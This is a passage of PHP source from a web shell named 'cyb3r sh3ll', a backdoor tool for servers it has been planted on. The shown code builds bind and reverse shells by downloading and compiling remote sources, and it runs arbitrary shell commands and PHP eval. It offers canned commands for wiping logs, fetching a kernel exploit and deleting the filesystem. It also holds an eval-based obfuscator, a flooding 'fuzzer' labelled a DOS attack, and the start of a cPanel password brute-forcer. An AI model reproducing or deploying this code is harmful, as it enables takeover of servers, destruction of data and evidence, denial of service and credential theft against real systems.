5348echo "<center><table width=\"50%\">Whois:<form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
5349}
5350}
5351
5352
5353
5354if ($act == "cracker")
5355{
5356 echo "
5357<br><center>
5358<a href=\"".$surl."act=hash\" >Hash</a><font color='silver'> -|- </font>
5359<a href=\"".$surl."act=smtp\" >SMTP</a><font color='silver'> -|- </font>
5360<a href=\"".$surl."act=pop3\" >POP3</a><font color='silver'> -|- </font>
5361<a href=\"".$surl."act=imap\" >IMAP</a><font color='silver'> -|- </font>
5362<a href=\"".$surl."act=ftp\" >FTP</a><font color='silver'> -|- </font>
5363<a href=\"".$surl."act=snmp\" >SNMP</a><font color='silver'> -|- </font>
5364<a href=\"".$surl."act=mysql\" >MySQL</a><font color='silver'> -|- </font>
5365<a href=\"".$surl."act=htmlform\" >HTTP Form</a><font color='silver'> -|- </font>
5366<a href=\"".$surl."act=basicauth\" >HTTP Auth(basic)</a><font color='silver'> -|- </font>
5367<a href=\"".$surl."act=cpanel\" >CPANEL</a><font color='silver'> -|- </font>
5368<a href=\"".$surl."act=dic\" >Dictionary Maker</a>
5369</center><br>";
5370}
5371
5372if ($act == "shells")
5373{ ?>
5374<TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%" border=1>
5375 <tr> <!-- 1 -->
5376 <td valign="top" width="50%" ><p align="center"><b>(: Bind/Reverse Shell :)</b></p></td>
5377 <td valign="top" ><p align="center"><b>[: Web Shell :]</b></p></td>
5378
5379 </tr>
5380 <tr><!-- 2 -->
5381 <td valign="top" ><center>
5382 <?php
5383
5384 $bndportsrcs = array(
5385
5386 "cyb3r_bindport.pl"=>array("Using PERL","perl %path %port"),
5387
5388 "cyb3r_bindport.c"=>array("Using C","%path %port %pass")
5389
5390 );
5391
5392 $bcsrcs = array(
5393
5394 "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"),
5395
5396 "cyb3r_backconn.c"=>array("Using C","%path %host %port")
5397
5398 );
5399
5400 $dpsrcs = array(
5401
5402 "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
5403
5404 "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
5405
5406 );
5407
5408 if (!is_array($bind)) {$bind = array();}
5409
5410 if (!is_array($bc)) {$bc = array();}
5411
5412 if (!is_array($datapipe)) {$datapipe = array();}
5413
5414
5415
5416 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
5417
5418 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
5419
5420
5421
5422 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
5423
5424 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
5425
5426
5427
5428 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
5429
5430 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
5431
5432 if (!empty($bindsubmit))
5433
5434 {
5435
5436 echo "<b>Result of binding port:</b><br>";
5437
5438 $v = $bndportsrcs[$bind["src"]];
5439
5440 if (empty($v)) {echo "Unknown file!<br>";}
5441
5442 elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
5443
5444 else
5445
5446 {
5447
5448 $w = explode(".",$bind["src"]);
5449
5450 $ext = $w[count($w)-1];
5451
5452 unset($w[count($w)-1]);
5453
5454 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
5455
5456 $binpath = $tmpdir.join(".",$w).rand(0,999);
5457
5458 if ($ext == "pl") {$binpath = $srcpath;}
5459
5460 @unlink($srcpath);
5461
5462 $fp = fopen($srcpath,"ab+");
5463
5464 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
5465
5466 elseif (!$data = cyb3rgetsource($bind["src"])) {echo "Can't download sources!";}
5467
5468 else
5469
5470 {
5471
5472 fwrite($fp,$data,strlen($data));
5473
5474 fclose($fp);
5475
5476 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
5477
5478 $v[1] = str_replace("%path",$binpath,$v[1]);
5479
5480 $v[1] = str_replace("%port",$bind["port"],$v[1]);
5481
5482 $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
5483
5484 $v[1] = str_replace("//","/",$v[1]);
5485
5486 $retbind = myshellexec($v[1]." > /dev/null &");
5487
5488 sleep(5);
5489
5490 $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
5491
5492 if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
5493
5494 else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
5495
5496 }
5497
5498 echo "<br>";
5499
5500 }
5501
5502 }
5503
5504 if (!empty($bcsubmit))
5505
5506 {
5507
5508 echo "<b>Result of back connection:</b><br>";
5509
5510 $v = $bcsrcs[$bc["src"]];
5511
5512 if (empty($v)) {echo "Unknown file!<br>";}
5513
5514 else
5515
5516 {
5517
5518 $w = explode(".",$bc["src"]);
5519
5520 $ext = $w[count($w)-1];
5521
5522 unset($w[count($w)-1]);
5523
5524 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
5525
5526 $binpath = $tmpdir.join(".",$w).rand(0,999);
5527
5528 if ($ext == "pl") {$binpath = $srcpath;}
5529
5530 @unlink($srcpath);
5531
5532 $fp = fopen($srcpath,"ab+");
5533
5534 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
5535
5536 elseif (!$data = cyb3rgetsource($bc["src"])) {echo "Can't download sources!";}
5537
5538 else
5539
5540 {
5541
5542 fwrite($fp,$data,strlen($data));
5543
5544 fclose($fp);
5545
5546 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
5547
5548 $v[1] = str_replace("%path",$binpath,$v[1]);
5549
5550 $v[1] = str_replace("%host",$bc["host"],$v[1]);
5551
5552 $v[1] = str_replace("%port",$bc["port"],$v[1]);
5553
5554 $v[1] = str_replace("//","/",$v[1]);
5555
5556 $retbind = myshellexec($v[1]." > /dev/null &");
5557
5558 echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
5559
5560 }
5561
5562 }
5563
5564 }
5565
5566 if (!empty($dpsubmit))
5567
5568 {
5569
5570 echo "<b>Result of datapipe-running:</b><br>";
5571
5572 $v = $dpsrcs[$datapipe["src"]];
5573
5574 if (empty($v)) {echo "Unknown file!<br>";}
5575
5576 elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
5577
5578 else
5579
5580 {
5581
5582 $srcpath = $tmpdir.$datapipe["src"];
5583
5584 $w = explode(".",$datapipe["src"]);
5585
5586 $ext = $w[count($w)-1];
5587
5588 unset($w[count($w)-1]);
5589
5590 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
5591
5592 $binpath = $tmpdir.join(".",$w).rand(0,999);
5593
5594 if ($ext == "pl") {$binpath = $srcpath;}
5595
5596 @unlink($srcpath);
5597
5598 $fp = fopen($srcpath,"ab+");
5599
5600 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
5601
5602 elseif (!$data = cyb3rgetsource($datapipe["src"])) {echo "Can't download sources!";}
5603
5604 else
5605
5606 {
5607
5608 fwrite($fp,$data,strlen($data));
5609
5610 fclose($fp);
5611
5612 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
5613
5614 list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
5615
5616 $v[1] = str_replace("%path",$binpath,$v[1]);
5617
5618 $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
5619
5620 $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
5621
5622 $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
5623
5624 $v[1] = str_replace("//","/",$v[1]);
5625
5626 $retbind = myshellexec($v[1]." > /dev/null &");
5627
5628 sleep(5);
5629
5630 $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
5631
5632 if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
5633
5634 else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
5635
5636 }
5637
5638 echo "<br>";
5639
5640 }
5641
5642 }
5643
5644 ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
5645
5646 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
5647
5648 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
5649
5650<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
5651
5652foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
5653
5654?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
5655
5656Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
5657
5658<b>Datapipe:</b><br>
5659<form action="<?php echo $surl; ?>">
5660<input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
5661
5662foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
5663
5664?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.
5665
5666
5667
5668
5669 </center></td>
5670
5671 <td ><center>
5672 <p align="center"><b>[: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Enter Command to Execute:</b></a> :]</b>
5673
5674<form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></p><br>
5675<div align="center">Useful Commands </div>
5676
5677
5678 <form action="<?php echo $surl; ?>">
5679
5680 <div align="center">
5681
5682 <input type=hidden name=act value="cmd">
5683
5684 <input type=hidden name="d" value="<?php echo $dispd; ?>">
5685
5686 <SELECT NAME="cmd">
5687
5688 <OPTION VALUE="uname -a">Kernel version</option>
5689
5690 <OPTION VALUE="w">Logged in users</option>
5691
5692 <OPTION VALUE="lastlog">Last to connect</option>
5693
5694 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins</option>
5695
5696 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!</option>
5697
5698 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?</option>
5699
5700 <OPTION VALUE="which wget curl w3m lynx">Downloaders?</option>
5701
5702 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO</option>
5703
5704 <OPTION VALUE="netstat -atup | grep IST">Open ports</option>
5705
5706 <OPTION VALUE="locate gcc">gcc installed?</option>
5707
5708 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)</option>
5709
5710 <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)</option>
5711
5712 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2</option>
5713
5714 <OPTION VALUE="./zap2">WIPELOGS PT3</option>
5715
5716 <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)</option>
5717
5718 <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)</option>
5719
5720 <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)</option>
5721
5722 <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)</option>
5723
5724 <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)</option>
5725
5726 <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)</option>
5727
5728 </SELECT>
5729
5730 <input type=hidden name="cmd_txt" value="1">
5731
5732 &nbsp;
5733
5734 <input type=submit name=submit value="Execute">
5735
5736 <br>
5737
5738 Warning. Kernel may be alerted using higher levels </div>
5739
5740 </form>
5741
5742 </center>
5743 </td>
5744
5745 </tr>
5746
5747 </table><?php
5748
5749}
5750
5751if ($act == "cmd")
5752
5753{
5754
5755if (trim($cmd) == "ps -aux") {$act = "processes";}
5756
5757elseif (trim($cmd) == "tasklist") {$act = "processes";}
5758
5759else
5760
5761{
5762
5763 @chdir($chdir);
5764
5765 if (!empty($submit))
5766
5767 {
5768
5769 echo "<b>Result of execution this command</b>:<br>";
5770
5771 $olddir = realpath(".");
5772
5773 @chdir($d);
5774
5775 $ret = myshellexec($cmd);
5776
5777 $ret = convert_cyr_string($ret,"d","w");
5778
5779 if ($cmd_txt)
5780
5781 {
5782
5783 $rows = count(explode("\r\n",$ret))+1;
5784
5785 if ($rows < 10) {$rows = 10;}
5786
5787 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
5788
5789 }
5790
5791 else {echo $ret."<br>";}
5792
5793 @chdir($olddir);
5794
5795 }
5796
5797 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
5798
5799 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
5800
5801}
5802
5803}
5804
5805if ($act == "phpcode")
5806{
5807 echo "
5808<br><center>
5809<a href=\"".$surl."act=eval\" >PHP Code Evaluate</a><font color='silver'> -|- </font>
5810<a href=\"".$surl."act=masscode\" >Mass Code Injector</a><font color='silver'> -|- </font>
5811<a href=\"".$surl."act=obfuscate\" >PHP Obfuscator</a><font color='silver'> -|- </font>
5812<a href=\"".$surl."act=fuzzer\" >Web Server Fuzzer</a>
5813</center><br>";
5814}
5815
5816if ($act == "eval")
5817
5818{
5819
5820 if (!empty($eval))
5821
5822 {
5823
5824 echo "<b>Result of execution this PHP-code</b>:<br>";
5825
5826 $tmp = ob_get_contents();
5827
5828 $olddir = realpath(".");
5829
5830 @chdir($d);
5831
5832 if ($tmp)
5833
5834 {
5835
5836 ob_clean();
5837
5838 eval($eval);
5839
5840 $ret = ob_get_contents();
5841
5842 $ret = convert_cyr_string($ret,"d","w");
5843
5844 ob_clean();
5845
5846 echo $tmp;
5847
5848 if ($eval_txt)
5849
5850 {
5851
5852 $rows = count(explode("\r\n",$ret))+1;
5853
5854 if ($rows < 10) {$rows = 10;}
5855
5856 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
5857
5858 }
5859
5860 else {echo $ret."<br>";}
5861
5862 }
5863
5864 else
5865
5866 {
5867
5868 if ($eval_txt)
5869
5870 {
5871
5872 echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
5873
5874 eval($eval);
5875
5876 echo "</textarea>";
5877
5878 }
5879
5880 else {echo $ret;}
5881
5882 }
5883
5884 @chdir($olddir);
5885
5886 }
5887
5888 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
5889
5890 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
5891
5892}
5893
5894if ($act == "proxy")
5895{
5896global $errorbox,$et,$footer,$hcwd;
5897echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
5898if (!empty($_REQUEST['urL'])){
5899$dir="";
5900$u=parse_url($_REQUEST['urL']);
5901$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
5902if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
5903$url=@fsockopen($host, 80, $errno, $errstr, 12);
5904if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
5905fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
5906while(!feof($url)){
5907$con = fgets($url);
5908$con = str_replace("href=mailto","HrEf=mailto",$con);
5909$con = str_replace("HREF=mailto","HrEf=mailto",$con);
5910$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
5911$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
5912$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
5913$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
5914$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5915$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5916$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5917$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5918$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
5919$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
5920$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5921$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5922$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5923$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5924$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5925$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5926echo $con;
5927}
5928fclose($url);
5929}
5930}
5931
5932
5933if ($act == "obfuscate")
5934{
5935 if ( isset($_POST['code']) &&
5936 $_POST['code'] != '')
5937 {
5938 $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
5939 $encode = '
5940<?php
5941$encoded = \''.$encoded.'\';
5942eval(gzinflate(base64_decode($encoded)));
5943// Encoded by cyb3r sh3ll. Thanx lionaneesh for this idea.
5944?>
5945';
5946 }
5947 else
5948 {
5949 $encode = 'Please Enter your Code! and Click Submit! :)';
5950 }?>
5951 <form method="POST">
5952 <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
5953 <input style="margin: 20px; margin-left: 50px; padding: 10px;" class="own" type="submit" value="Encode :D"/>
5954 </form>
5955 <?php
5956}
5957
5958if ($act == "fuzzer")
5959{
5960 if(isset($_POST['ip']) &&
5961 isset($_POST['port']) &&
5962 isset($_POST['times']) &&
5963 isset($_POST['time']) &&
5964 isset($_POST['message']) &&
5965 isset($_POST['messageMultiplier']) &&
5966 $_POST['message'] != "" &&
5967 $_POST['time'] != "" &&
5968 $_POST['times'] != "" &&
5969 $_POST['port'] != "" &&
5970 $_POST['ip'] != "" &&
5971 $_POST['messageMultiplier'] != ""
5972 )
5973 {
5974 $IP=$_POST['ip'];
5975 $port=$_POST['port'];
5976 $times = $_POST['times'];
5977 $timeout = $_POST['time'];
5978 $send = 0;
5979 $ending = "";
5980 $multiplier = $_POST['messageMultiplier'];
5981 $data = "";
5982 $mode="tcp";
5983 $data .= "POST /";
5984 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
5985 if($_POST['type'] == "tcp")
5986 {
5987 $mode = "tcp";
5988 }
5989 while($multiplier--)
5990 {
5991 $data .= urlencode($_POST['message']);
5992 }
5993 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
5994 $data .= "by-cyb3r-sh3ll".$ending;
5995 $length = strlen($data);
5996
5997
5998 echo "Sending Data :- <br /> <p align='center'>$data</p>";
5999
6000 print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message <br>";
6001 for($i=0;$i<$times;$i++)
6002 {
6003 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
6004 if($socket)
6005 {
6006 fwrite($socket , $data , $length );
6007 fclose($socket);
6008 }
6009 }
6010 echo "<script>alert('Fuzzing Completed!');</script>";
6011 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
6012 echo "Total Number of Packets Sent : " . $times . "<br />";
6013 echo "Total Data Sent = ". showsizE($times*$length) . "<br />";
6014 echo "Data per packet = " . showsizE($length) . "<br />";
6015 }
6016 else
6017 {
6018 ?>
6019 <form method="POST">
6020 <input type="hidden" name="fuzz" />
6021 <table id="margins">
6022 <tr>
6023 <td width="400" class="title">
6024 IP
6025 </td>
6026 <td>
6027 <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
6028 </td>
6029 </tr>
6030
6031 <tr>
6032 <td class="title">
6033 Port
6034 </td>
6035 <td>
6036 <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
6037 </td>
6038 </tr>
6039
6040 <tr>
6041 <td class="title">
6042 Timeout
6043 </td>
6044 <td>
6045 <input type="text" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>
6046 </td>
6047 </tr>
6048
6049
6050 <tr>
6051 <td class="title">
6052 No of times
6053 </td>
6054 <td>
6055 <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />
6056 </td>
6057 </tr>
6058
6059 <tr>
6060 <td class="title">
6061 Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
6062 </td>
6063 <td>
6064 <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
6065 </td>
6066 <td>
6067 x
6068 </td>
6069 <td width="20">
6070 <input style="width: 30px;" name="messageMultiplier" value="10" />
6071 </td>
6072 </tr>
6073
6074 <tr>
6075 <td rowspan="2">
6076 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it be! :D"/>
6077 </td>
6078 </tr>
6079 </table>
6080 </form>
6081 <?php
6082 }
6083}
6084
6085if ($act == "cpanel")
6086{
6087$cpanel_port="2082";
6088$connect_timeout=5;
6089set_time_limit(0);
6090$submit=$_REQUEST['submit'];
6091$users=$_REQUEST['users'];
6092$pass=$_REQUEST['passwords'];
6093$target=$_REQUEST['target'];
6094$cracktype=$_REQUEST['cracktype'];
6095if($target == ""){
6096$target = "localhost";
6097}
6098$charset=$_REQUEST['charset'];
6099if($charset=="")
6100 $charset="lowercase";
6101$max_length=$_REQUEST['max_length'];
6102if($max_length=="")
6103 $max_length=10;
6104$min_length=$_REQUEST['min_length'];
6105if($min_length=="")
6106 $min_length=1;
6107
6108 $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6109 $charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
6110 $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");
6111 $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6112 $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6113 $charsetuppernumeric = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
6114 $charsetletters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" );
6115 $charsetsymbols= array("!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6116 $charsetlowersymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6117 $charsetuppersymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6118 $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6119 $charsetnumericsymbols = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6120 $charsetlowernumericsymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
6121 $charsetuppernumericsymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
